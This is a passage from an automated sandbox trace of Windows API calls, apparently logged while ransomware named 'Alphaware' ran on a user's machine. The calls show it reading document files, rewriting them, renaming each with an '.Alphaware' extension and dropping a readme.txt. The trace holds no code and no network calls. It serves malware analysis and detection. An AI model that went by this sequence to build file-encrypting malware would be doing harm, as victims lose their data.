lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0084.997] WriteFile (in: hFile=0x254, lpBuffer=0x25580d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x25580d0*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0084.997] WriteFile (in: hFile=0x254, lpBuffer=0x25580d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x25580d0*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0084.998] WriteFile (in: hFile=0x254, lpBuffer=0x25580d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x25580d0*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0084.998] WriteFile (in: hFile=0x254, lpBuffer=0x25580d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x25580d0*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0084.998] WriteFile (in: hFile=0x254, lpBuffer=0x25580d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x25580d0*, lpNumberOfBytesWritten=0x23e958*=0x1000, lpOverlapped=0x0) returned 1 [0084.999] WriteFile (in: hFile=0x254, lpBuffer=0x25580d0*, nNumberOfBytesToWrite=0xdb4, lpNumberOfBytesWritten=0x23e8b8, lpOverlapped=0x0 | out: lpBuffer=0x25580d0*, lpNumberOfBytesWritten=0x23e8b8*=0xdb4, lpOverlapped=0x0) returned 1 [0084.999] CloseHandle (hObject=0x254) returned 1 [0085.002] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7e8) returned 1 [0085.002] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\t2V3IQcrptDn.rtf" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\beaeacczbwdfqo39\\t2v3iqcrptdn.rtf"), fInfoLevelId=0x0, lpFileInformation=0x23eb10 | out: lpFileInformation=0x23eb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xde00db30, ftCreationTime.dwHighDateTime=0x1d96c28, ftLastAccessTime.dwLowDateTime=0xdc576d20, ftLastAccessTime.dwHighDateTime=0x1d973cc, ftLastWriteTime.dwLowDateTime=0x84dc8440, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xcdb4)) returned 1 [0085.002] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e798) returned 1 [0085.002] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\t2V3IQcrptDn.rtf" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\beaeacczbwdfqo39\\t2v3iqcrptdn.rtf"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\t2V3IQcrptDn.rtf.Alphaware" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\beaeacczbwdfqo39\\t2v3iqcrptdn.rtf.alphaware")) returned 1 [0085.005] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\T6C4G_g_0sfV1dVJsM.pptx", nBufferLength=0x105, lpBuffer=0x23e660, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\T6C4G_g_0sfV1dVJsM.pptx", lpFilePart=0x0) returned 0x4a [0085.005] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\T6C4G_g_0sfV1dVJsM.pptx", dwFileAttributes=0x80) returned 1 [0085.005] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8b8) returned 1 [0085.005] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\T6C4G_g_0sfV1dVJsM.pptx" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\beaeacczbwdfqo39\\t6c4g_g_0sfv1dvjsm.pptx"), fInfoLevelId=0x0, lpFileInformation=0x25595d0 | out: lpFileInformation=0x25595d0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xaddd62c0, ftCreationTime.dwHighDateTime=0x1d97308, ftLastAccessTime.dwLowDateTime=0x492e00, ftLastAccessTime.dwHighDateTime=0x1d9744d, ftLastWriteTime.dwLowDateTime=0x492e00, ftLastWriteTime.dwHighDateTime=0x1d9744d, nFileSizeHigh=0x0, nFileSizeLow=0x18887)) returned 1 [0085.005] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e868) returned 1 [0085.006] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\T6C4G_g_0sfV1dVJsM.pptx", nBufferLength=0x105, lpBuffer=0x23e430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\T6C4G_g_0sfV1dVJsM.pptx", lpFilePart=0x0) returned 0x4a [0085.006] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e948) returned 1 [0085.006] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\T6C4G_g_0sfV1dVJsM.pptx" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\beaeacczbwdfqo39\\t6c4g_g_0sfv1dvjsm.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0085.006] GetFileType (hFile=0x254) returned 0x1 [0085.006] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8b8) returned 1 [0085.006] GetFileType (hFile=0x254) returned 0x1 [0085.006] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x23eac8 | out: lpFileSizeHigh=0x23eac8*=0x0) returned 0x18887 [0085.007] ReadFile (in: hFile=0x254, lpBuffer=0x128d78e8, nNumberOfBytesToRead=0x18887, lpNumberOfBytesRead=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x128d78e8*, lpNumberOfBytesRead=0x23e9f8*=0x18887, lpOverlapped=0x0) returned 1 [0085.009] CloseHandle (hObject=0x254) returned 1 [0085.054] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e878) returned 1 [0085.055] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\T6C4G_g_0sfV1dVJsM.pptx" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\beaeacczbwdfqo39\\t6c4g_g_0sfv1dvjsm.pptx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0085.057] GetFileType (hFile=0x254) returned 0x1 [0085.057] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7e8) returned 1 [0085.057] GetFileType (hFile=0x254) returned 0x1 [0085.061] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7e8) returned 1 [0085.061] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\T6C4G_g_0sfV1dVJsM.pptx" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\beaeacczbwdfqo39\\t6c4g_g_0sfv1dvjsm.pptx"), fInfoLevelId=0x0, lpFileInformation=0x23eb10 | out: lpFileInformation=0x23eb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaddd62c0, ftCreationTime.dwHighDateTime=0x1d97308, ftLastAccessTime.dwLowDateTime=0x492e00, ftLastAccessTime.dwHighDateTime=0x1d9744d, ftLastWriteTime.dwLowDateTime=0x84e609c0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x20c34)) returned 1 [0085.061] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e798) returned 1 [0085.062] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\T6C4G_g_0sfV1dVJsM.pptx" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\beaeacczbwdfqo39\\t6c4g_g_0sfv1dvjsm.pptx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\T6C4G_g_0sfV1dVJsM.pptx.Alphaware" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\beaeacczbwdfqo39\\t6c4g_g_0sfv1dvjsm.pptx.alphaware")) returned 1 [0085.062] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\xexTT Q3v7p50maSoJ5.rtf", dwFileAttributes=0x80) returned 1 [0085.063] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8b8) returned 1 [0085.063] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\xexTT Q3v7p50maSoJ5.rtf" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\beaeacczbwdfqo39\\xextt q3v7p50masoj5.rtf"), fInfoLevelId=0x0, lpFileInformation=0x23f23d0 | out: lpFileInformation=0x23f23d0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe05659d0, ftCreationTime.dwHighDateTime=0x1d966cb, ftLastAccessTime.dwLowDateTime=0x87df7c30, ftLastAccessTime.dwHighDateTime=0x1d9750f, ftLastWriteTime.dwLowDateTime=0x87df7c30, ftLastWriteTime.dwHighDateTime=0x1d9750f, nFileSizeHigh=0x0, nFileSizeLow=0x14712)) returned 1 [0085.063] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e868) returned 1 [0085.063] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e948) returned 1 [0085.063] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\xexTT Q3v7p50maSoJ5.rtf" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\beaeacczbwdfqo39\\xextt q3v7p50masoj5.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0085.063] GetFileType (hFile=0x254) returned 0x1 [0085.063] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8b8) returned 1 [0085.063] GetFileType (hFile=0x254) returned 0x1 [0085.063] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x23eac8 | out: lpFileSizeHigh=0x23eac8*=0x0) returned 0x14712 [0085.064] ReadFile (in: hFile=0x254, lpBuffer=0x23f26a8, nNumberOfBytesToRead=0x14712, lpNumberOfBytesRead=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23f26a8*, lpNumberOfBytesRead=0x23e9f8*=0x14712, lpOverlapped=0x0) returned 1 [0085.065] CloseHandle (hObject=0x254) returned 1 [0085.157] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e878) returned 1 [0085.157] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\xexTT Q3v7p50maSoJ5.rtf" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\beaeacczbwdfqo39\\xextt q3v7p50masoj5.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0085.159] GetFileType (hFile=0x254) returned 0x1 [0085.159] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7e8) returned 1 [0085.159] GetFileType (hFile=0x254) returned 0x1 [0085.162] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7e8) returned 1 [0085.162] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\xexTT Q3v7p50maSoJ5.rtf" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\beaeacczbwdfqo39\\xextt q3v7p50masoj5.rtf"), fInfoLevelId=0x0, lpFileInformation=0x23eb10 | out: lpFileInformation=0x23eb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe05659d0, ftCreationTime.dwHighDateTime=0x1d966cb, ftLastAccessTime.dwLowDateTime=0x87df7c30, ftLastAccessTime.dwHighDateTime=0x1d9750f, ftLastWriteTime.dwLowDateTime=0x84f45200, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1b4f4)) returned 1 [0085.163] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e798) returned 1 [0085.163] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\xexTT Q3v7p50maSoJ5.rtf" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\beaeacczbwdfqo39\\xextt q3v7p50masoj5.rtf"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\xexTT Q3v7p50maSoJ5.rtf.Alphaware" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\beaeacczbwdfqo39\\xextt q3v7p50masoj5.rtf.alphaware")) returned 1 [0085.164] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eaf8) returned 1 [0085.164] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x285f34c0, ftCreationTime.dwHighDateTime=0x1d96c28, ftLastAccessTime.dwLowDateTime=0x84f6b360, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x84f6b360, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.164] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9dfec1c0, ftCreationTime.dwHighDateTime=0x1d97202, ftLastAccessTime.dwLowDateTime=0x35776ec0, ftLastAccessTime.dwHighDateTime=0x1d9766e, ftLastWriteTime.dwLowDateTime=0x8492b9a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xe7c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="1wWkN7zA3pJvJ0l2.pdf.Alphaware", cAlternateFileName="1WWKN7~1.ALP")) returned 1 [0085.165] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85dcb960, ftCreationTime.dwHighDateTime=0x1d96c32, ftLastAccessTime.dwLowDateTime=0xe57e1bf0, ftLastAccessTime.dwHighDateTime=0x1d9759e, ftLastWriteTime.dwLowDateTime=0x8499ddc0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xf448, dwReserved0=0x0, dwReserved1=0x0, cFileName="2Y7NVeZda.ppt.Alphaware", cAlternateFileName="2Y7NVE~1.ALP")) returned 1 [0085.165] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ecbd0, ftCreationTime.dwHighDateTime=0x1d96933, ftLastAccessTime.dwLowDateTime=0xb8b73d0, ftLastAccessTime.dwHighDateTime=0x1d9697c, ftLastWriteTime.dwLowDateTime=0x849ea080, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xf6c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="7Cu9qgyf.ods.Alphaware", cAlternateFileName="7CU9QG~1.ALP")) returned 1 [0085.165] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5652cdc0, ftCreationTime.dwHighDateTime=0x1d96e70, ftLastAccessTime.dwLowDateTime=0x9c1979f0, ftLastAccessTime.dwHighDateTime=0x1d975c6, ftLastWriteTime.dwLowDateTime=0x84a82600, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x17048, dwReserved0=0x0, dwReserved1=0x0, cFileName="7xJk20t-OlNiKzpOa_.odp.Alphaware", cAlternateFileName="7XJK20~1.ALP")) returned 1 [0085.165] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19230a70, ftCreationTime.dwHighDateTime=0x1d96c84, ftLastAccessTime.dwLowDateTime=0xf1687e70, ftLastAccessTime.dwHighDateTime=0x1d97269, ftLastWriteTime.dwLowDateTime=0x84af4a20, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xba48, dwReserved0=0x0, dwReserved1=0x0, cFileName="DMtfYZ.doc.Alphaware", cAlternateFileName="DMTFYZ~1.ALP")) returned 1 [0085.165] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c407d30, ftCreationTime.dwHighDateTime=0x1d9725b, ftLastAccessTime.dwLowDateTime=0x7ebf7a90, ftLastAccessTime.dwHighDateTime=0x1d975a2, ftLastWriteTime.dwLowDateTime=0x84b66e40, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x19060, dwReserved0=0x0, dwReserved1=0x0, cFileName="IdqAQbUtMr09oklG_Ot.xls.Alphaware", cAlternateFileName="IDQAQB~1.ALP")) returned 1 [0085.165] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc63fcc40, ftCreationTime.dwHighDateTime=0x1d96d63, ftLastAccessTime.dwLowDateTime=0x220b28c0, ftLastAccessTime.dwHighDateTime=0x1d9769d, ftLastWriteTime.dwLowDateTime=0x84bd9260, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1b774, dwReserved0=0x0, dwReserved1=0x0, cFileName="k3 HQLaJEyY.odp.Alphaware", cAlternateFileName="K3HQLA~1.ALP")) returned 1 [0085.165] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97486200, ftCreationTime.dwHighDateTime=0x1d97496, ftLastAccessTime.dwLowDateTime=0x137463b0, ftLastAccessTime.dwHighDateTime=0x1d975dc, ftLastWriteTime.dwLowDateTime=0x84d2fec0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x101b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="kxX8q7znVEV6F AiDQyX.xlsx.Alphaware", cAlternateFileName="KXX8Q7~1.ALP")) returned 1 [0085.165] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8492b9a0, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x8492b9a0, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x8492b9a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 1 [0085.165] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xde00db30, ftCreationTime.dwHighDateTime=0x1d96c28, ftLastAccessTime.dwLowDateTime=0xdc576d20, ftLastAccessTime.dwHighDateTime=0x1d973cc, ftLastWriteTime.dwLowDateTime=0x84dc8440, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xcdb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="t2V3IQcrptDn.rtf.Alphaware", cAlternateFileName="T2V3IQ~1.ALP")) returned 1 [0085.165] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaddd62c0, ftCreationTime.dwHighDateTime=0x1d97308, ftLastAccessTime.dwLowDateTime=0x492e00, ftLastAccessTime.dwHighDateTime=0x1d9744d, ftLastWriteTime.dwLowDateTime=0x84e609c0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x20c34, dwReserved0=0x0, dwReserved1=0x0, cFileName="T6C4G_g_0sfV1dVJsM.pptx.Alphaware", cAlternateFileName="T6C4G_~1.ALP")) returned 1 [0085.165] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe05659d0, ftCreationTime.dwHighDateTime=0x1d966cb, ftLastAccessTime.dwLowDateTime=0x87df7c30, ftLastAccessTime.dwHighDateTime=0x1d9750f, ftLastWriteTime.dwLowDateTime=0x84f45200, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1b4f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="xexTT Q3v7p50maSoJ5.rtf.Alphaware", cAlternateFileName="XEXTTQ~1.ALP")) returned 1 [0085.165] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe05659d0, ftCreationTime.dwHighDateTime=0x1d966cb, ftLastAccessTime.dwLowDateTime=0x87df7c30, ftLastAccessTime.dwHighDateTime=0x1d9750f, ftLastWriteTime.dwLowDateTime=0x84f45200, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1b4f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="xexTT Q3v7p50maSoJ5.rtf.Alphaware", cAlternateFileName="XEXTTQ~1.ALP")) returned 0 [0085.165] FindClose (in: hFindFile=0xd8a1f0 | out: hFindFile=0xd8a1f0) returned 1 [0085.165] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7f8) returned 1 [0085.165] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23ea18) returned 1 [0085.166] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ec38) returned 1 [0085.167] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e833eb0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.167] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8365c0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0085.168] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0085.168] FindClose (in: hFindFile=0xd8a1f0 | out: hFindFile=0xd8a1f0) returned 1 [0085.168] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e938) returned 1 [0085.168] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eb58) returned 1 [0085.168] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Downloads\\desktop.ini", dwFileAttributes=0x80) returned 1 [0085.168] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0085.169] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Downloads\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\downloads\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x24c35e0 | out: lpFileInformation=0x24c35e0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8365c0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x11a)) returned 1 [0085.169] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0085.169] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0085.169] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Downloads\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\downloads\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0085.169] GetFileType (hFile=0x254) returned 0x1 [0085.169] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0085.169] GetFileType (hFile=0x254) returned 0x1 [0085.169] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x23ec08 | out: lpFileSizeHigh=0x23ec08*=0x0) returned 0x11a [0085.170] ReadFile (in: hFile=0x254, lpBuffer=0x24c3940, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x24c3940*, lpNumberOfBytesRead=0x23eb38*=0x11a, lpOverlapped=0x0) returned 1 [0085.171] CloseHandle (hObject=0x254) returned 1 [0085.191] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0085.191] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Downloads\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\downloads\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0085.192] GetFileType (hFile=0x254) returned 0x1 [0085.192] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0085.193] GetFileType (hFile=0x254) returned 0x1 [0085.194] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0085.244] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Downloads\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\downloads\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x84f914c0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x248)) returned 1 